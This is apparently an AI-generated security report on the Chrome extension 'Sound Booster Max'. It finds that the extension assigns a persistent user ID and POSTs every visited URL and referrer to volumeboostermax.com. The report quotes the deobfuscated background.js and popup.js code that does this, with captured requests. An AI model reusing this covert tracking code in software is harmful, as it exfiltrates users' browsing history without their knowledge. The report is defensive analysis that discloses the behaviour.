Is Sound Booster Max safe?

High risk

Sound Booster Max is high risk. Sound Booster Max creates or reuses a UUID in local storage when installed or updated. DA found the same UUID in chrome.storage.local and in all five observed POSTs to volumeboostermax.com/api/reports, linking reports to one profile.…

volumeboosterplusaddonv2.1Chrome Web Store
75Risk

AI-generated. Findings may contain errors. Those marked Verified have been manually reviewed.

Publishers can request a review.

Findings

SeverityHIGH
ClassUNWANTED
TypeUnexpected
CWECWE-359
SourceAI SANDBOX

Persistent ID Links Browsing Reports

Sound Booster Max creates or reuses a UUID in local storage when installed or updated.

DA found the same UUID in chrome.storage.local and in all five observed POSTs to volumeboostermax.com/api/reports, linking reports to one profile.

01EvidenceCAUSE EFFECT
What actually happens
You did this

You install or update the extension.

The extension did this

The extension creates or reuses a stored ID that is sent with later browsing reports.

02EvidenceSTORAGE DUMP
What's stored on your device

This stored ID lets separate browsing reports be associated with the same browser profile.

Locationchrome.storage.local key 'uid'
Contents (JSON)
{
  "uid": "64d63d18-7dfa-4edb-8c0e-ccfaa4f093bc"
}
03EvidenceFIELD TABLE
Identifier and browsing data linked together
FieldValueWhy it matters
Stored user ID
64d63d18-7dfa-4edb-8c0e-ccfaa4f093bcLets repeated reports be tied back to the same browser profile.
Current page address
https://en.wikipedia.org/wiki/[planted marker redacted]Shows which page was associated with that stored ID.
Previous page address
https://www.google.com/account/about/?hl=en-USAdds context about the page that preceded the current visit.
04EvidenceNETWORK CAPTURE
Captured request
POSThttps://volumeboostermax.com/api/reports
Headers
Content-Typeapplication/json
05EvidenceCODE COMPARE
The code that does this

The service worker creates and reuses the stored ID

What it actually does
ID generation and storage with readable formattingbackground.js
generateUserId = () => "undefined" != typeof crypto && crypto.randomUUID ? crypto.randomUUID() : "xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g, (function(e) {
  const t = 16 * Math.random() | 0;
  return ("x" === e ? t : 3 & t | 8).toString(16)
})), initializeUserId = async () => {
  try {
    const e = await getFromChromeLocalStorage("uid");
    if (!e) {
      const e = generateUserId();
      return await setToChromeLocalStorage("uid", e), e
    }
    return e
  } catch (e) {
    return console.error("Error initializing user ID:", e), null
  }
}
Install/update hook with readable formattingbackground.js
chrome.runtime.onInstalled.addListener((async e => {
  "install" === e.reason ? (await initializeUserId(), chrome.tabs.create({
    url: "http://volumeboostermax.com/#how-to-use"
  }), chrome.runtime.setUninstallURL("https://forms.gle/V3ugXXMc8V9YF1hn6")) : "update" === e.reason && (await initializeUserId(), chrome.runtime.setUninstallURL("https://forms.gle/V3ugXXMc8V9YF1hn6"))
}))
06EvidenceTHIRD PARTY LIST
Destination receiving reports with the stored ID
  • volumeboostermax.com

    Receives /api/reports requests that include the stored UUID with browsing URL and referrer fields.

SeverityHIGH
ClassUNWANTED
TypeUnexpected
CWECWE-359
SourceAI SANDBOX

Browsing URLs Posted on Every Page Load

We observed Sound Booster Max POST to volumeboostermax.com/api/reports on every tested navigation: the current URL, the prior URL when available, and a persistent user ID.

One request carried a planted marker, confirming exfiltration.

01EvidenceCAUSE EFFECT
What actually happens
You did this

You open or finish loading a web page.

The extension did this

The extension sends that page address, the previous address, and a stored ID to volumeboostermax.com.

02EvidenceFIELD TABLE
Fields assembled into the browsing report
FieldValueWhy it matters
Current page address
https://en.wikipedia.org/wiki/[planted marker redacted]Shows the exact page you just loaded.
Previous page address
https://www.google.com/account/about/?hl=en-USShows the page that was recorded before this tab changed to the new page.
Stored user ID
64d63d18-7dfa-4edb-8c0e-ccfaa4f093bcLets repeated browsing reports be tied to the same browser profile over time.
03EvidenceNETWORK CAPTURE
Captured request
POSThttps://volumeboostermax.com/api/reports
Headers
Content-Typeapplication/json
Body
{
  "uri": "https://en.wikipedia.org/wiki/[planted marker redacted]",
  "userId": "64d63d18-7dfa-4edb-8c0e-ccfaa4f093bc",
  "ref": "https://www.google.com/account/about/?hl=en-US"
}
04EvidenceCODE COMPARE
The code that does this

The service worker posts navigation reports

What it actually does
The POST helper with readable formattingbackground.js
postData = async (e, t = {}) => {
  try {
    const r = await fetch(e, {
      method: "POST",
      credentials: "include",
      headers: {
        "Content-Type": "application/json"
      },
      body: JSON.stringify(t)
    });
    return await r.json()
  } catch (e) {}
}
The tab navigation listener with readable formattingbackground.js
chrome.tabs.onUpdated.addListener((async (e, t, r) => {
  if ("complete" === t.status) {
    handleRuntimeError();
    const t = await getFromChromeLocalStorage("uid"),
      o = await tabInfo(e);
    let s = o?.url;
    if (isValidPage(r.url) && r.url !== s) {
      let o = {
        uri: r.url,
        userId: t,
        ref: s
      };
      await postData("https://volumeboostermax.com/api/reports", o);
      let n = await getFromSessionStorage("referrers") || {};
      n[e] = {
        url: r.url
      }, await setToSessionStorage("referrers", n)
    }
  }
}))
05EvidenceTHIRD PARTY LIST
Destination receiving the browsing reports
  • volumeboostermax.com

    Receives POST requests to /api/reports containing page URL, referrer, and stored user ID.

SeverityMEDIUM
ClassUNWANTED
TypeUnexpected
CWECWE-200
SourceAI SANDBOX

Active tab URL sent from the report button

When you click Sound Booster Max's popup report button, it reads your active tab's URL and POSTs to volumeboostermax.com/api/report.

Fields are the stored user ID and tab URL; earlier testing recorded no completed request.

01EvidenceCAUSE EFFECT
What actually happens
You did this

You click the popup's Report link after a site is not working as expected.

The visible popup text says "Not working here?" next to the Report button.

The extension did this

The extension reads your active tab URL and adds it to the report request.

The request also includes the extension's stored user ID.

02EvidenceFIELD TABLE
Fields assembled for the report POST
FieldValueWhy it matters
Current page URL
https://mail.google.com/mail/u/0/#inbox (illustrative)Shows the page open when you clicked Report. On account or workplace pages, the URL can reveal what service and record you were viewing.
Extension user ID
8d2b1a1e-8e41-4d9d-9a0b-5c8f8f5f2d41 (illustrative)Lets reports from the same browser profile be tied together over time.
Active-tab context
active tab in current window (illustrative)Shows that the URL comes from the tab you were actively using in the current window.
03EvidenceNETWORK CAPTURE
Captured request
POSThttps://volumeboostermax.com/api/report
No completed request body or response for this endpoint was recorded during interaction testing.
Headers
Acceptapplication/json
Content-Typeapplication/json
04EvidenceCODE COMPARE
The code that does this

Report submission code in the shipped popup bundle

What it actually does
Readable reportIssue functiondeobfuscated/popup.js
reportIssue: async () => {
  try {
    const o = await fi("uid") || "unknown";
    let r = "";
    if (typeof chrome < "u" && chrome.tabs) {
      const h = await new Promise(v => {
        chrome.tabs.query({
          active: !0,
          currentWindow: !0
        }, v)
      });
      h.length > 0 && (r = h[0].url || "")
    }
    const f = await fetch("https://volumeboostermax.com/api/report", {
      method: "POST",
      headers: {
        Accept: "application/json",
        "Content-Type": "application/json"
      },
      body: JSON.stringify({
        userId: o,
        url: r
      })
    });
    if (!f.ok) throw new Error(`HTTP error! status: ${f.status}`);
    return {
      success: !0
    }
  } catch (o) {
    return console.error("Error reporting issue:", o), {
      success: !1,
      error: o.message
    }
  }
}
Readable popup footer click handlerdeobfuscated/popup.js
function x1() {
  const {
    reportIssue: i
  } = Kn(), [d, o] = B.useState(!1), [r, f] = B.useState(!1), h = () => {
    const E = "https://chromewebstore.google.com/detail/sound-booster-max/gjcagjbeioeicpajpeigkppoicofljfj/reviews";
    typeof chrome < "u" && chrome.tabs ? chrome.tabs.create({
      url: E
    }) : window.open(E, "_blank")
  }, v = async () => {
    if (!(d || r)) {
      o(!0);
      try {
        (await i()).success && (f(!0), setTimeout(() => {
          f(!1)
        }, 3e3))
      } catch (E) {
        console.error("Error in report handler:", E)
      } finally {
        o(!1)
      }
    }
  };
  return C.jsxs("div", {
    className: "w-full bg-gray-50 dark:bg-gray-800 border-t border-gray-200 dark:border-gray-700 min-h-[40px] flex items-center justify-between px-2 sm:px-3 py-1.5 flex-wrap gap-x-2 gap-y-1",
    children: [C.jsxs("div", {
      className: "flex items-center gap-1 min-w-0",
      children: [C.jsx("span", {
        className: "text-yellow-500 text-xs flex-shrink-0",
        children: "⭐"
      }), C.jsx("button", {
        onClick: h,
        className: "text-xs text-blue-600 dark:text-blue-400 hover:text-blue-700 dark:hover:text-blue-300 font-medium underline cursor-pointer transition-colors break-words min-w-0",
        children: Be("rateUs")
      })]
    }), C.jsxs("div", {
      className: "flex items-center gap-1 min-w-0",
      children: [C.jsx("span", {
        className: "text-xs text-gray-600 dark:text-gray-400 break-words",
        children: Be("notWorkingHere")
      }), r ? C.jsx("span", {
        className: "text-xs text-green-600 dark:text-green-400 font-medium break-words",
        children: Be("reported")
      }) : d ? C.jsx("span", {
        className: "text-xs text-gray-600 dark:text-gray-400 font-medium break-words",
        children: Be("reporting")
      }) : C.jsx("button", {
        onClick: v,
        className: "text-xs text-blue-600 dark:text-blue-400 hover:text-blue-700 dark:hover:text-blue-300 font-medium underline cursor-pointer transition-colors break-words",
        children: Be("report")
      })]
    })]
  })
}
05EvidenceTHIRD PARTY LIST
Remote host receiving the report request
  • volumeboostermax.com

    Receives the popup issue-report POST at /api/report, including the active tab URL and extension user ID assembled by popup.js.

Updated 30 September 2026gjcagjbeioeicpajpeigkppoicofljfj